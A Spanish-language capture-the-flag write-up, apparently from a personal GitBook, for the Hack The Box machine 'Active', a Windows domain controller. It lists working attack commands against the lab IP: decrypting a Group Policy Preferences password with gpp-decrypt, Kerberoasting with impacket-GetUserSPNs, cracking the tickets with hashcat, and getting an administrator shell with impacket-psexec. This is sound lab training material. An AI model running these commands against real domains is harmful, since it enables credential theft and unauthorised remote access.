xerosec
  • whoami
  • CTF Checklists
    • Enumeración inicial
    • Vectores de ataque
    • Escalada de privilegios
    • Active Directory
  • Writeups
    • YouTube - Walkthroughs en español
    • Hack The Box
      • Nibbles
      • Blocky
      • Irked
      • Traverxec
      • Cronos
      • Active
      • Devel
      • Chatterbox
      • Secnotes
    • TryHackMe
      • Hacking with Powershell
      • Enterprise
      • Chill Hack
      • Mr Robot CTF
      • Daily Bugle
      • Rootme
      • Attacktive Directory
      • Retro
  • Apuntes y recursos OSCP
    • Técnicas fundamentales
    • Linux
      • Linux Basics
      • Linux Privesc
    • Windows
      • Windows Basics
      • Windows Privesc
      • Ataques MITM
      • Enumeración Post-Explotación
      • Ataques Post-Explotación
  • Recursos
    • Plataformas de aprendizaje
Con tecnología de GitBook
En esta página
  • Resumen de la resolución
  • Habilidades adquiridas
  • Comandos y herramientas destacables
  • Walkthrough en YouTube:
  1. Writeups
  2. Hack The Box

Active

Resumen de la resolución

  • Máquina Windows DC con servicio SMB expuesto

  • Explotación SMB con pivoting de usuarios

  • Abuso de GPP (Group Policy Preference) para conseguir credenciales encriptadas con Microsoft AES

  • Ataque Kerberoasting

Habilidades adquiridas

  • Explotación de GPP, característica que se puede encontrar en sistemas Windows Server 2008 y previos, para conseguir credenciales encriptadas almacenadas en el archivo Groups.xml y desencriptarlas posteriormente con gpp-decrypt.

gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

Comandos y herramientas destacables

  • Kerberoasting

impacket-GetUserSPNs active.htb/SVC_TGS -dc-ip 10.129.228.53 -request -o krb5tgs.txt
hashcat -m 13100 krb5tgs_hashes /usr/share/wordlists/rockyou.txt
  • Obtención de shell abusando de permisos de escritura en recursos compartidos por SMB

impacket-psexec active.htb/administrator@10.129.228.53

impacket-psexec carga un ejecutable con un nombre aleatorio en uno de los recursos compartidos de Windows y registra un servicio a través de RPC que nos otorga una shell interactiva

Walkthrough en YouTube:

AnteriorCronosSiguienteDevel

Última actualización hace 1 año